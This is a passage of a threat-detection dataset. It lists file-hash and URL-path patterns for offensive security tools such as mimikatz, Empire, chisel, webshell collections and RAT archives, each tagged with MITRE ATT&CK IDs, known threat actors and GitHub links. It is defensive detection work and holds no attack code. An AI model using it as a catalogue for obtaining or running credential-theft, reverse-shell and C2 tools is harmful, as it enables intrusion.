LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22060" "*127f1bfca312fa054a6e761df8c330967ed93dbe80ca78357e9b727faea0c5ef*",".{0,1000}127f1bfca312fa054a6e761df8c330967ed93dbe80ca78357e9b727faea0c5ef.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","22062" "*128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264*",".{0,1000}128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22063" "*1286a0815c6982fadf3a1da2565fedfd133b8d07a5de1d592a640c3abbc2ffa5*",".{0,1000}1286a0815c6982fadf3a1da2565fedfd133b8d07a5de1d592a640c3abbc2ffa5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22064" "*128cbad77f003d2c34c42041a88e628de1abcbc3ba0c2e6aa3e886a2d0bec83c*",".{0,1000}128cbad77f003d2c34c42041a88e628de1abcbc3ba0c2e6aa3e886a2d0bec83c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy 
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22066" "*12949a43a532f0a6ed86b7a877df767050ffa81e3afa47241fbf61cbec5e58f9*",".{0,1000}12949a43a532f0a6ed86b7a877df767050ffa81e3afa47241fbf61cbec5e58f9.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","22068" "*12962d7fe733b60acfffc35698b22328453c2a04665c90758f53f31fdf81cbf8*",".{0,1000}12962d7fe733b60acfffc35698b22328453c2a04665c90758f53f31fdf81cbf8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22069" "*12987a2b5075539702057175b5355b545884e49cc5d836f84ec5ce8f2cd47635*",".{0,1000}12987a2b5075539702057175b5355b545884e49cc5d836f84ec5ce8f2cd47635.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22071" "*12a5454a02b28e9ad2e478356792d8d18c554d25518c95b6c57f6f8e0b1319a6*",".{0,1000}12a5454a02b28e9ad2e478356792d8d18c554d25518c95b6c57f6f8e0b1319a6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 
- TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22073" "*12a7c285045a2963e92a9440777baf1ee1c8d2b15f2df222913f04ba4f27d04b*",".{0,1000}12a7c285045a2963e92a9440777baf1ee1c8d2b15f2df222913f04ba4f27d04b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22074" "*12aa6879942823c8807fa8fb30e248e1c0504c2588995ff6930c446eb2b999d5*",".{0,1000}12aa6879942823c8807fa8fb30e248e1c0504c2588995ff6930c446eb2b999d5.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22075" "*12bb1ec9171a601039a806395bb84d225eb0ac7e1ec975b91061dda5894b2dd7*",".{0,1000}12bb1ec9171a601039a806395bb84d225eb0ac7e1ec975b91061dda5894b2dd7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22076" 
"*12bc134420da64f0ff3a93d3a1ca6376677ae9c0494b545173bf20e45787e873*",".{0,1000}12bc134420da64f0ff3a93d3a1ca6376677ae9c0494b545173bf20e45787e873.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","22077" "*12c8b5d3a0a5fe18a149da3c33b14b2cd0fb548e4ef491e1d242ae4ad7e7b8e4*",".{0,1000}12c8b5d3a0a5fe18a149da3c33b14b2cd0fb548e4ef491e1d242ae4ad7e7b8e4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22079" "*12c9cf22a8a7c652c7ea63dbbdf7ffac3052ca6b49828d03261cc258d95afeef*",".{0,1000}12c9cf22a8a7c652c7ea63dbbdf7ffac3052ca6b49828d03261cc258d95afeef.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","22080" "*12d146f460ca2fca230ba12f1f8ead49340022793ac262b87732a517477c237d*",".{0,1000}12d146f460ca2fca230ba12f1f8ead49340022793ac262b87732a517477c237d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - 
T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22081" "*12d55d1fbe1ca3c7889434234adfda1abfbd5a8aacb076026b4a94e81d696bd5*",".{0,1000}12d55d1fbe1ca3c7889434234adfda1abfbd5a8aacb076026b4a94e81d696bd5.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","22083" "*12da3e3bfe44e83838a66ed2c8cbaf3fd7153b815d21dd14c2f8de2f10130b3d*",".{0,1000}12da3e3bfe44e83838a66ed2c8cbaf3fd7153b815d21dd14c2f8de2f10130b3d.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - 
TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22085" "*12dbd354b4cc073ea7f80cc0d74bd96118362e9c120df7800cf0f9e863569f98*",".{0,1000}12dbd354b4cc073ea7f80cc0d74bd96118362e9c120df7800cf0f9e863569f98.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22086" "*12de29e0372dc7deeb72828e2d98d1f918a9b1093ca55a579cbec210a31fb325*",".{0,1000}12de29e0372dc7deeb72828e2d98d1f918a9b1093ca55a579cbec210a31fb325.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22087" "*12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625*",".{0,1000}12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - 
T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22088" "*12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625*",".{0,1000}12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat 
Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22089" "*12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73*",".{0,1000}12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22091" "*12e55226b801ebdfcc9334ca438a57db1da463de48e2893009a7bb3e5e5e0dbc*",".{0,1000}12e55226b801ebdfcc9334ca438a57db1da463de48e2893009a7bb3e5e5e0dbc.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","22092" "*12e90d90d2c9c31ab613cfec98d6b7b982610ebbe460536ece39593a7eb16596*",".{0,1000}12e90d90d2c9c31ab613cfec98d6b7b982610ebbe460536ece39593a7eb16596.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22093" "*12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62*",".{0,1000}12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","22094" "*12eb25ef52882b1d26acfcdd8eedc223874bcc405be27cc669fa655f2564c64e*",".{0,1000}12eb25ef52882b1d26acfcdd8eedc223874bcc405be27cc669fa655f2564c64e.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","22095" "*12fafdb155bc9caa4e45317fe688bc312179863fbc4e66c5ccc014fad977ebfd*",".{0,1000}12fafdb155bc9caa4e45317fe688bc312179863fbc4e66c5ccc014fad977ebfd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - 
T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22096" "*1302e8b96f9a4f7230cd751f740305bb98231e4b9cb5ebeb68ba0d4fd71231b6*",".{0,1000}1302e8b96f9a4f7230cd751f740305bb98231e4b9cb5ebeb68ba0d4fd71231b6.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22097" "*130a517af6464f5a3d5e390b5fb90711029720b59cdeaab3c0300b4cf57227f9*",".{0,1000}130a517af6464f5a3d5e390b5fb90711029720b59cdeaab3c0300b4cf57227f9.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","22100" "*130af28d5a846c7f961a6a0a1188e1688501d8c0c4a3df4c1451005f1fc162fa*",".{0,1000}130af28d5a846c7f961a6a0a1188e1688501d8c0c4a3df4c1451005f1fc162fa.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","22101" "*13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de*",".{0,1000}13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22103" "*13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b*",".{0,1000}13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22104" 
"*1312202e1f36db3f8bb319c6a886ba558373b83dd9d8bd54a8fc42ae156d81cb*",".{0,1000}1312202e1f36db3f8bb319c6a886ba558373b83dd9d8bd54a8fc42ae156d81cb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","22105" "*1316ca67af20db4bc3b47218855dfd47d9075f0a72bb681821f70af4fdce6f5c*",".{0,1000}1316ca67af20db4bc3b47218855dfd47d9075f0a72bb681821f70af4fdce6f5c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22107" "*131bacdddd51f0d5d869b63912606719cd8f7a8f5b5f4237cbdb5c2e22e2cba2*",".{0,1000}131bacdddd51f0d5d869b63912606719cd8f7a8f5b5f4237cbdb5c2e22e2cba2.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#filehash","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","22108" "*131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a*",".{0,1000}131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22109" "*1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6*",".{0,1000}1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22111" "*132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5*",".{0,1000}132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","#filehash","image","5","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","22112" "*132d0b0131489f45673dc3eb4c226f31c08faebfbbcbdce3b77fc07ea9ca12cd*",".{0,1000}132d0b0131489f45673dc3eb4c226f31c08faebfbbcbdce3b77fc07ea9ca12cd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22113" "*1337*/api/agents/*/results?token=*",".{0,1000}1337.{0,1000}\/api\/agents\/.{0,1000}\/results\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 
- T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22114" "*1337*/api/creds?token=*",".{0,1000}1337.{0,1000}\/api\/creds\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
